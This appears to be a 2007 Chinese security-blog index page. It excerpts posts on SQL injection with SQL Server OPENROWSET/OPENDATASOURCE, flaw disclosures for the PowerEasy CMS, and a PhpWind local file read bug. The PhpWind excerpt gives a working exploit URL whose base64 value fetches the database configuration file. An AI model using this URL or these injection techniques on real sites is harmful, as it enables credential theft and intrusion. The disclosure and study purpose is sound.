分类 ‘技术文章’ 下的日志

openrowset/opendatasource的其它技巧

2007/05/17 7:29 | 鬼仔 | 技术文章 | 消灭0回复

来源:5up3rh3i'blog
前言:
openrowset/opendatasource的应用大家应该很熟悉了,cadt[1]就是利用的openrowset,其实我们利用openrowset/opendatasource还可

以做很多事情。

一、函数原形参考:

OPENROWSET:http://msdn2.microsoft.com/zh-cn/library/ms190312(SQL.90).aspx

OPENROWSET
( { 'provider_name' , { 'datasource' 'user_id' 'password'
| 'provider_string' }
, { [ catalog. ] [ schema. ] object
| 'query'
阅读全文 »

Tags: , ,

动易网站管理系统User\User_saveflash.asp页面存在任意文件删除漏洞

2007/05/16 4:25 | 鬼仔 | 技术文章 | 1 个回复

鬼仔注:
h4k_b4n授权( http://www.huaidan.org/blog )首发,转载请注明。

h4k_b4n授权内容:
今天委托鬼仔( http://www.huaidan.org/blog )所公开的漏洞信息均为我方提交漏洞后,保留一定时间以后所公开的!任何与该信息产生的责任,与我方以及授权转载方无关!据知已有部分所谓黑客论坛在内部偷取信息然后进行小范围的信息传播,我们鄙视这样子的行为,鄙视偷取信息的某人!

信息来源:Bug.Center.Team内部论坛( http://www.cnbct.org )

发布日期:2006-12-20 应急事件响应公告(BCTCERA0612)
阅读全文 »

Tags: ,

动易网站管理系统Count\Counter.asp页面存在SQL注入漏洞

2007/05/16 4:23 | 鬼仔 | 技术文章 | 消灭0回复

鬼仔注:
h4k_b4n授权( http://www.huaidan.org/blog )首发,转载请注明。

h4k_b4n授权内容:
今天委托鬼仔( http://www.huaidan.org/blog )所公开的漏洞信息均为我方提交漏洞后,保留一定时间以后所公开的!任何与该信息产生的责任,与我方以及授权转载方无关!据知已有部分所谓黑客论坛在内部偷取信息然后进行小范围的信息传播,我们鄙视这样子的行为,鄙视偷取信息的某人!

信息来源:Bug.Center.Team内部论坛( http://www.cnbct.org )

发布日期:2006-12-20 应急事件响应公告(BCTCERA0611)
阅读全文 »

Tags: , , ,

动易网站管理系统API_Response.asp页面存在SQL注入漏洞

2007/05/16 4:15 | 鬼仔 | 技术文章 | 消灭0回复

鬼仔注:
h4k_b4n授权( http://www.huaidan.org/blog )首发,转载请注明。

h4k_b4n授权内容:
今天委托鬼仔( http://www.huaidan.org/blog )所公开的漏洞信息均为我方提交漏洞后,保留一定时间以后所公开的!任何与该信息产生的责任,与我方以及授权转载方无关!据知已有部分所谓黑客论坛在内部偷取信息然后进行小范围的信息传播,我们鄙视这样子的行为,鄙视偷取信息的某人!

信息来源:Bug.Center.Team内部论坛( http://www.cnbct.org )

发布日期:2006-10-26 应急事件响应公告(BCTCERA0610)
阅读全文 »

Tags: , , ,

动易2006网站管理系统NewComment.asp页面参数过滤不足导致sql注入漏洞

2007/05/16 3:56 | 鬼仔 | 技术文章 | 5 个回复

鬼仔注:
h4k_b4n授权( http://www.huaidan.org/blog )首发,转载请注明。

h4k_b4n授权内容:
今天委托鬼仔( http://www.huaidan.org/blog )所公开的漏洞信息均为我方提交漏洞后,保留一定时间以后所公开的!任何与该信息产生的责任,与我方以及授权转载方无关!据知已有部分所谓黑客论坛在内部偷取信息然后进行小范围的信息传播,我们鄙视这样子的行为,鄙视偷取信息的某人!

信息来源:Bug.Center.Team内部论坛( http://www.cnbct.org )

发布日期:2006-10-18 应急事件响应公告(BCTCERA0607)
阅读全文 »

Tags: , , ,

SQL INJECTION的终极利器opendatasource和openrowset

2007/05/13 8:23 | 鬼仔 | 技术文章 | 3 个回复

鬼仔注:很老的文章了,05年4月份的,存档。文章末尾提供DOC文档和文中提及的工具下载,其中DOC文档来自neeao那里,工具是我google了好长时间才找到的,不知道为什么这么难找。

作者:LCX

目前市面上的SQL INECTION工具很多,最受推崇的当属NBSI了。SQL INECTION的方法在网上是也是满天飞,大家仔细学一下都会很快的成为脚本入侵高手。可是无论是工具,还是众多方法,猜SQL数据的时候原理不外乎两种。一个是对方的WEB服务器在没有关闭错误提示的时候是用让SQL出错来暴出想要的信息;一个是在对方的WEB服务器关闭错误提示的时候采用ASCII码拆半分法分析。当关闭错误提示的时候,这时来猜数据就很慢了,遇到网速蜗牛的时候真是急死人,NBSI此时还经常会出现猜解错误是 阅读全文 »

Tags: , , ,

opendatasource 学习 记录

2007/05/13 8:18 | 鬼仔 | 技术文章 | 消灭0回复

鬼仔注:lcx写的,不过lcx的站现在打不开。

来源:scofeld's blog

实现功能:
获取所有库.当前库所有表.表里所有内容.分区路径.

本机建立库和表,方便反弹时写进东西.
阅读全文 »

Tags:

PhpWind 防盗链插件Showpic.php本地读文件漏洞

2007/05/11 7:04 | 鬼仔 | 技术文章 | 1 个回复

信息来源:H4x0r's Blog

漏洞文件:
showpic.php

str=$_SERVER['QUERY_STRING'];
$img=base64_decode($str);
$codelen=strlen($safeguard);//获取附加码长度
$img=substr($img,$codelen); //去掉附加码
readfile($img);

提交的参数经过base64编码后直接用readfile读文件,所以可以把路径base64编码后提交,以读出文件内容

漏洞利用方式:

http://bbs.xxx.com/showpic.php?ZGF0YS9zcWxfY29uZmlnLnBocA==

然后查看源文件。

这里的ZGF0YS9zcWxfY29uZmlnLnBocA== 阅读全文 »

Tags: ,